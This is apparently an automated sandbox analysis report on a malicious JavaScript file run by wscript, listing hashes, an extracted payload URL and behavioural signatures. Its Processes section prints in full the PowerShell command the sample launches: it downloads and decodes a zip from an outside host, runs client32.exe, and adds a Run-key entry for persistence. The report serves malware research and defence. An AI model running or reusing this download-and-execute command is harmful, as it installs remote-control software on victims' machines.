Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
01/09/2023, 19:59
Static task
static1
Behavioral task
behavioral1
Sample
package_details_____________________972968.js
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
package_details_____________________972968.js
Resource
win10v2004-20230831-en
General
-
Target
package_details_____________________972968.js
-
Size
3KB
-
MD5
bf6b4c0fc43b5aa0c9bb21b94d795240
-
SHA1
c6826cb6d10ef41842348522571cf28a25720f04
-
SHA256
9101403bb729cabebd79206aad130293890154cd7a6fba3417471a645ea3ef25
-
SHA512
173f1ce1ddb6d40d7faa59338a7dcd7a6c97249d467485b890116b84b9cdc480e8825cdeca845c527c6b98b203de898ac827027b56f78a5556429135b965c1e7
Malware Config
Extracted
https://svirtual.sanviatorperu.edu.pe/readme.txt
https://svirtual.sanviatorperu.edu.pe/readme.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2580 powershell.exe 4 2580 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2580 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2580 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1680 wrote to memory of 2580 1680 wscript.exe 28 PID 1680 wrote to memory of 2580 1680 wscript.exe 28 PID 1680 wrote to memory of 2580 1680 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\package_details_____________________972968.js1⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C "$u='https://svirtual.sanviatorperu.edu.pe/readme.txt';$6=(New-Object System.Net.WebClient).DownloadString($u);$a=[System.Convert]::FromBase64String($6);$d=[System.Environment]::GetFolderPath('ApplicationData')+'\D';if (!(Test-Path $d -PathType Container)) { New-Item -Path $d -ItemType Directory };$p=Join-Path $d 'p.zip';[System.IO.File]::WriteAllBytes($p,$a);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$d)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $d 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$s=$d+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='X';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580
-